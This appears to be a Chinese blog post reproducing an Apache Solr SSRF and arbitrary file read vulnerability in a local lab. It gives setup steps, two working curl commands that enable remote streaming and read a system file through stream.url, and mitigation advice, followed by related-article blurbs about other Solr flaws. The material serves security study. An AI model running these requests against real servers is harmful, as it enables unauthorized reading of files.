漏洞复现:Apache solr

最新推荐文章于 2024-08-03 19:06:23 发布
最新推荐文章于 2024-08-03 19:06:23 发布
阅读量320 收藏 7
点赞数 7
分类专栏: vulhub漏洞复现 文章标签: solr lucene 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68416970/article/details/140777862
版权

目录

漏洞简述

环境搭建

漏洞复现

漏洞检测

漏洞修复

漏洞简述

Apache Solr是一个开源的搜索服务,使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器,是Apache Lucene项目的开源企业搜索平台。

该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。

影响版本

  • Apache Solr <=8.8.1 (latest) ,通杀所有版本,官方拒绝修复

环境搭建

下载链接:链接: https://pan.baidu.com/s/1h4MM2XAOWspfTh4QOwGjhw?pwd=6dtf 提取码: 6dtf

解压到小蓝皮(phpstudy_pro)的根目录

在 bin 目录的地址栏输入 cmd 打开终端,开启一个端口

solr start -p 3333

在浏览器搜索

127.0.0.1:3333

如果127.0.0.1不行的话就使用 ipconfig 命令查看本机IP,用本机 IP 去访问

此时 Solr 已经在 server/solr 目录下已经创建了名字为 new_core 的文件夹

把 solr-8.8.1\server\solr\configsets\_default 下的 conf 的文件夹复制到 solr-8.8.1\server\solr\new_core 目录里

然后再返回页面点击 Add Core

漏洞复现

通过访问以下地址可以看到当前的 Core 名称

http://127.0.0.1:3333/solr/admin/cores?indexInfo=false&wt=json

结合上一步获取到的 Core 名称访问以下地址可查看详细信息

http://127.0.0.1:3333/solr/new_core/config

使用 curl 对 Config API 打开默认关闭的requestDispatcher.requestParsers.enableRemoteStreaming开关

curl -d "{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}" http://192.168.110.24:3333/solr/new_core/config -H "Content-type:application/json"

使用 curl 对 stream.url 参数利用 file 伪协议读取本机的 hosts 的文件

curl "http://192.168.110.24:3333/solr/new_core/debug/dump?param=ContentStreams" -F "stream.url=file:///C:\Windows\System32\drivers\etc\hosts"

漏洞检测

GitHub - Henry4E36/Solr-SSRF: Apache Solr SSRF(CVE-2021-27905)

GitHub - W2Ning/Solr-SSRF: CVE-2021-27905

漏洞修复

  • 将 Solr 端口仅对内网开放,并配置访问策略
  • 无修复版本

燕雀安知鸿鹄之志哉.
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Solr Velocity 注入远程命令执行漏洞复现 (CVE-2019-17558)
墨痕诉清风的博客
11-06 463
SolrApache Lucene项目的开源企业搜索平台。2019年10月30日,国外安全研究人员放出了一个关于solr 模板注入的exp,攻击者通过授权访问solr服务器,发送特定的数据包开启 params.resource.loader.enabled,然后get访问接口导致服务器命令执行。默认情况下params.resource.loader.enabled配置打开,无法使用自定义模板。,服务启动后,访问http://your-ip:8983即可查看到一个无需权限的Apache Solr服务。.
Apache Solr漏洞复现汇总
千寻的博客
03-31 1970
Apache Solr漏洞复现汇总
Apache Solr RCE (CVE-2020-13957)授权上传漏洞 + Velocity模板远程执行(CVE-2019-17558)复现
ximo的博客
04-28 526
漏洞概述 (CVE-2020-13957)授权上传漏洞: 在特定的Solr版本中ConfigSet API存在授权上传漏洞 ,配合CVE-2019-17558可执行任意命令。 (CVE-2019-17558)Velocity模板远程执行: 攻击者在知道Solr服务器上Core名称后,先把params.resource.loader.enabled设置为true(就可加载指定资源),再进行远程执行命令。 配合CVE-2020-13957上传漏洞上传Core,进行攻击。 影响版本 CVE-2020-1395
solr-web页面授权访问漏洞整改-身份认证授权访问
鲸落资源
04-21 2030
②在/server/contexts 文件夹下添加以下内容,并将文件名设置为:solr-jetty-context.xml(有可能已存在该文件,可直接编辑修改(添加至尾部即可))solrweb页面是无需授权认证即可登陆访问的,但这种情况在安全性要求较高的项目中,是有风险的,一般的渗透测试,都会发现存在这个问题,那么就需要进行整改了。注释:test登陆账号,888888密码,admin 表示当前用户授权的是admin 角色,这里用户可以配置多个账号(每行一个)2、进行用户认证,授权访问
Apache Solr RCE 授权上传漏洞(CVE-2020-13957)
weixin_44047654的博客
02-15 742
Apache Solr RCE 授权上传漏洞(CVE-2020-13957)
【转】Apache Solr 访问权限控制
weixin_34405354的博客
12-30 165
  本文转自:http://www.cnblogs.com/ibook360/archive/2011/11/07/2239247.html 在Tomcat6增加 Solr访问权限方法如下: 编辑tomcat6/Catalina/localhost/solr.xml &lt;Context docBase="/var/solr/solr.war" debug="0" privile...
Apache Solr 授权上传(RCE)漏洞(CVE-2020-13957)加固操作指南
乐大厨串串香飘万里
08-09 687
Apache Solr 授权上传(RCE)漏洞(CVE-2020-13957)
Apache Solr velocity模板注入RCE漏洞复现
无心的博客
11-01 1131
目录 0x01 漏洞介绍0x02 漏洞范围0x03 漏洞复现 0x01 漏洞介绍 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于web-service的API接口。10月31号,国外安全研究院S00pY在GitHub发布了Apache Solr Velocity模板注入RCE的poc,截至写稿之时,Apache Solr官方还发布该漏洞的补丁。 0x02 漏洞范围 Apache So...
Apache-Solr 任意文件读取漏洞复现
不想当脚本小子的脚本小子
03-20 679
2021.3.18新出的,无CVE编号 Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。它是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果 一、漏洞描述 Apache Solr 存在任意文件读取漏洞,攻击者可以在授权的情况下获取目标服务器敏感文.
漏洞复现Apache Solr Velocity远程代码执行
AmyBaby00的博客
10-31 465
本文为学习笔记,仅限学习交流 不得利用、从事危害国家或人民安全、荣誉和利益等活动 请参阅《中华人民共和国网络安全法》 本文转载于:https://qiita.com/shimizukawasaki/items/a5a9d951e5d1a7c1cfef [进攻复现] Apache Solr Velocity模板远程代码执行 近日,国外安全专家s00py公开了一个Apache Solr的Velocit...
Apache Solr 授权上传(RCE)漏洞(CVE-2020-13957)的原理分析与验证
smellycat000的专栏
10-15 1239
聚焦源代码安全,网罗国内外最新资讯!01漏洞简介Apache Solr 发布公告,旧版本的ConfigSet API 中存在授权上传漏洞风险,被利用可能导致 RCE (远程代码执行)...
Apache Solr 访问权限控制
weixin_34194087的博客
11-07 338
在Tomcat6增加 Solr访问权限方法如下: 编辑tomcat6/Catalina/localhost/solr.xml &lt;Context docBase="/var/solr/solr.war" debug="0" privileged="true" allowLinking="true" crossContext="true"&gt;&lt;Environmen
Solr 授权访问
maverickpig的博客
02-18 2521
Solr授权访问
三十种授权访问漏洞复现 合集( 一 )
最新发布
qq_48368964的博客
08-03 1258
开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增、删、改、查高危动作)而且可以远程访问数据库。造成授权访问的根本原因就在于启动 Mongodb 的时候设置 –auth 也很少会有人会给数据库添加上账号密码(默认空口令),使用默认空口令这将导致恶意攻击者无需进行账号认证就可以登陆到数据服务器。
Apche Solr 授权上传漏洞(CVE-2020-13957)
m0_48520508的博客
11-13 444
0x00简介 Solr 是一个开源的企业级搜索服务器,底层使用易于扩展和修改的Java 来实现。服务器通信使用标准的HTTP 和XML,所以如果使用Solr 了解Java 技术会有用却不是必须的要求。 Solr 主要特性有:强大的全文检索功能,高亮显示检索结果,动态集群,数据库接口和电子文档(Word ,PDF 等)的处理。而且Solr 具有高度的可扩展,支持分布搜索和索引的复制。 0x01漏洞概述 Apache Solr 发布公告,旧版本的 ConfigSet API 中存在授权上传漏洞风险,被利用可
Apche Solr 授权上传漏洞(CVE-2020-13957)复现
weixin_47531489的博客
07-19 412
1 简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 2 漏洞概述 Apache Solr发布公告,旧版本的ConfigSet API中存在授权上传漏洞风险,被利用可能导致RCE(远程代码执行)。威胁等级为高危 3 影响版本 Apache Solr 6.6.0-6.6.5 Apache Solr
(2022年12月)Solr授权访问导致getshell,任意代码执行
qq1140037586的博客
12-20 2096
Solr是一个高性能,采用Java开发,基于Lucene的全文搜索服务器。Solr的管理界面通常包含如下信息:solr的配置信息(包括路径,用户名,系统版本信息),数据库的配置信息(地址,用户名,密码),数据库搜索数据等。solr授权访问的危害很大,轻则可查询所有数据库信息,重则可读取系统任意文件,设置getshell.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值